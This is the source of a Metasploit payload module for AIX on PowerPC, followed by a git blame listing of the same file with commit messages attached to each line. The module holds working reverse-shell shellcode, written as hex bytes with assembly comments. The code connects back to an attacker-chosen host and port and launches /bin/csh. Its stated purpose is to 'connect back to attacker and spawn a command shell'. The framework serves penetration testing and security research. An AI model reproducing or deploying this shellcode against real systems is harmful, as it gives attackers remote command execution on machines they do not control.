metasploit-framework/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Aix
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'AIX Command Shell, Reverse TCP Inline',
			'Description'   => 'Connect back to attacker and spawn a command shell',
			'Author'        => 'Ramon de C Valle',
			'License'       => MSF_LICENSE,
			'Platform'      => 'aix',
			'Arch'          => ARCH_PPC,
			'Handler'       => Msf::Handler::ReverseTcp,
			'Session'       => Msf::Sessions::CommandShellUnix,
			'Payload'       =>
				{
					'Offsets' =>
						{
							'LHOST'    => [ 32, 'ADDR' ],
							'LPORT'    => [ 30, 'n'    ],
						},
				}
		))

	end

	def generate(*args)
		super(*args)

		payload =
		"\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
		"\x40\x82\xff\xfd"     +#   bnel    <cntsockcode>              #
		"\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
		"\x3b\xde\x01\xff"     +#   cal     r30,511(r30)               #
		"\x3b\xde\xfe\x25"     +#   cal     r30,-475(r30)              #
		"\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
		"\x4e\x80\x04\x20"     +#   bctr                               #
		"\xff\x02\x11\x5c"     +#   .long   0xff02115c                 #
		"\x7f\x00\x00\x01"     +#   .long   0x7f000001                 #
		"\x4c\xc6\x33\x42"     +#   crorc   6,6,6                      #
		"\x44\xff\xff\x02"     +#   svca    0                          #
		"\x3b\xde\xff\xf8"     +#   cal     r30,-8(r30)                #
		"\x3b\xa0\x07\xff"     +#   lil     r29,2047                   #
		"\x38\x9d\xf8\x02"     +#   cal     r4,-2046(r29)              #
		"\x38\x7d\xf8\x03"     +#   cal     r3,-2045(r29)              #
		@cal_socket +
		"\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
		"\x4e\x80\x04\x21"     +#   bctrl                              #
		"\x7c\x7c\x1b\x78"     +#   mr      r28,r3                     #
		"\x38\xbd\xf8\x11"     +#   cal     r5,-2031(r29)              #
		"\x38\x9e\xff\xf8"     +#   cal     r4,-8(r30)                 #
		@cal_connect +
		"\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
		"\x4e\x80\x04\x21"     +#   bctrl                              #
		"\x3b\x7d\xf8\x03"     +#   cal     r27,-2045(r29)             #
		"\x7f\x63\xdb\x78"     +#   mr      r3,r27                     #
		@cal_close +
		"\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
		"\x4e\x80\x04\x21"     +#   bctrl                              #
		"\x7f\x65\xdb\x78"     +#   mr      r5,r27                     #
		"\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
		"\x7f\x83\xe3\x78"     +#   mr      r3,r28                     #
		@cal_kfcntl +
		"\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
		"\x4e\x80\x04\x21"     +#   bctrl                              #
		"\x37\x7b\xff\xff"     +#   ai.     r27,r27,-1                 #
		"\x40\x80\xff\xd4"     +#   bge     <cntsockcode+100>          #
		"\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
		"\x40\x82\xff\xfd"     +#   bnel    <cntsockcode+148>          #
		"\x7f\x08\x02\xa6"     +#   mflr    r24                        #
		"\x3b\x18\x01\xff"     +#   cal     r24,511(r24)               #
		"\x38\x78\xfe\x29"     +#   cal     r3,-471(r24)               #
		"\x98\xb8\xfe\x31"     +#   stb     r5,-463(r24)               #
		"\x94\xa1\xff\xfc"     +#   stu     r5,-4(r1)                  #
		"\x94\x61\xff\xfc"     +#   stu     r3,-4(r1)                  #
		"\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
		@cal_execve +
		"\x7f\xc9\x03\xa6"     +#   mtctr   r30                        #
		"\x4e\x80\x04\x21"     +#   bctrl                              #
		"/bin/csh"

		# If the payload is generated and there are offsets to substitute,
		# do that now.
		if (payload and offsets)
			substitute_vars(payload, offsets)
		end

		payload
	end

end
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`##`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`##`

			`require 'msf/core'`
			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00
			`module Metasploit3`

			`include Msf::Payload::Single`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`include Msf::Payload::Aix`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`include Msf::Sessions::CommandShellOptions`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00
			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'AIX Command Shell, Reverse TCP Inline',`
			`'Description' => 'Connect back to attacker and spawn a command shell',`
Update author information 2012-09-19 14:55:30 +00:00			`'Author' => 'Ramon de C Valle',`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`'License' => MSF_LICENSE,`
			`'Platform' => 'aix',`
			`'Arch' => ARCH_PPC,`
			`'Handler' => Msf::Handler::ReverseTcp,`
big commit for converting meterpreter scripts to modules, see #3377. also fixes payload tab-completion and 'show payloads' after TARGET has changed git-svn-id: file:///home/svn/framework3/trunk@11421 4d416f70-5f16-0410-b530-b9f4589650da 2010-12-27 17:46:42 +00:00			`'Session' => Msf::Sessions::CommandShellUnix,`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`'Payload' =>`
			`{`
			`'Offsets' =>`
			`{`
			`'LHOST' => [ 32, 'ADDR' ],`
			`'LPORT' => [ 30, 'n' ],`
			`},`
			`}`
			`))`

			`end`

All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`def generate(*args)`
			`super(*args)`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`payload =`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #`
			`"\x40\x82\xff\xfd" +# bnel <cntsockcode> #`
			`"\x7f\xc8\x02\xa6" +# mflr r30 #`
			`"\x3b\xde\x01\xff" +# cal r30,511(r30) #`
			`"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #`
			`"\x7f\xc9\x03\xa6" +# mtctr r30 #`
			`"\x4e\x80\x04\x20" +# bctr #`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`"\xff\x02\x11\x5c" +# .long 0xff02115c #`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\x00\x00\x01" +# .long 0x7f000001 #`
			`"\x4c\xc6\x33\x42" +# crorc 6,6,6 #`
			`"\x44\xff\xff\x02" +# svca 0 #`
			`"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #`
Change the base value used for calculating the system call numbers and arguments to avoid null bytes in newer versions of AIX. git-svn-id: file:///home/svn/framework3/trunk@9347 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-23 19:47:48 +00:00			`"\x3b\xa0\x07\xff" +# lil r29,2047 #`
			`"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #`
			`"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`@cal_socket +`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\xc9\x03\xa6" +# mtctr r30 #`
			`"\x4e\x80\x04\x21" +# bctrl #`
			`"\x7c\x7c\x1b\x78" +# mr r28,r3 #`
Change the base value used for calculating the system call numbers and arguments to avoid null bytes in newer versions of AIX. git-svn-id: file:///home/svn/framework3/trunk@9347 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-23 19:47:48 +00:00			`"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`@cal_connect +`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\xc9\x03\xa6" +# mtctr r30 #`
			`"\x4e\x80\x04\x21" +# bctrl #`
Change the base value used for calculating the system call numbers and arguments to avoid null bytes in newer versions of AIX. git-svn-id: file:///home/svn/framework3/trunk@9347 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-23 19:47:48 +00:00			`"\x3b\x7d\xf8\x03" +# cal r27,-2045(r29) #`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\x63\xdb\x78" +# mr r3,r27 #`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`@cal_close +`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\xc9\x03\xa6" +# mtctr r30 #`
			`"\x4e\x80\x04\x21" +# bctrl #`
			`"\x7f\x65\xdb\x78" +# mr r5,r27 #`
			`"\x7c\x84\x22\x78" +# xor r4,r4,r4 #`
			`"\x7f\x83\xe3\x78" +# mr r3,r28 #`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`@cal_kfcntl +`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\xc9\x03\xa6" +# mtctr r30 #`
			`"\x4e\x80\x04\x21" +# bctrl #`
			`"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #`
			`"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #`
			`"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #`
			`"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #`
			`"\x7f\x08\x02\xa6" +# mflr r24 #`
			`"\x3b\x18\x01\xff" +# cal r24,511(r24) #`
			`"\x38\x78\xfe\x29" +# cal r3,-471(r24) #`
			`"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #`
			`"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #`
			`"\x94\x61\xff\xfc" +# stu r3,-4(r1) #`
			`"\x7c\x24\x0b\x78" +# mr r4,r1 #`
All your POWER are belong to us. git-svn-id: file:///home/svn/framework3/trunk@6698 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-23 03:49:25 +00:00			`@cal_execve +`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"\x7f\xc9\x03\xa6" +# mtctr r30 #`
Small corrections. git-svn-id: file:///home/svn/framework3/trunk@6911 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-28 04:46:57 +00:00			`"\x4e\x80\x04\x21" +# bctrl #`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`"/bin/csh"`

Change the base value used for calculating the system call numbers and arguments to avoid null bytes in newer versions of AIX. git-svn-id: file:///home/svn/framework3/trunk@9347 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-23 19:47:48 +00:00			`# If the payload is generated and there are offsets to substitute,`
fixed aix payloads to REALLY do variable substitution git-svn-id: file:///home/svn/framework3/trunk@8418 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-08 22:41:36 +00:00			`# do that now.`
			`if (payload and offsets)`
			`substitute_vars(payload, offsets)`
			`end`

			`payload`
Added AIX Power payload modules git-svn-id: file:///home/svn/framework3/trunk@5900 4d416f70-5f16-0410-b530-b9f4589650da 2008-11-13 01:58:36 +00:00			`end`

			`end`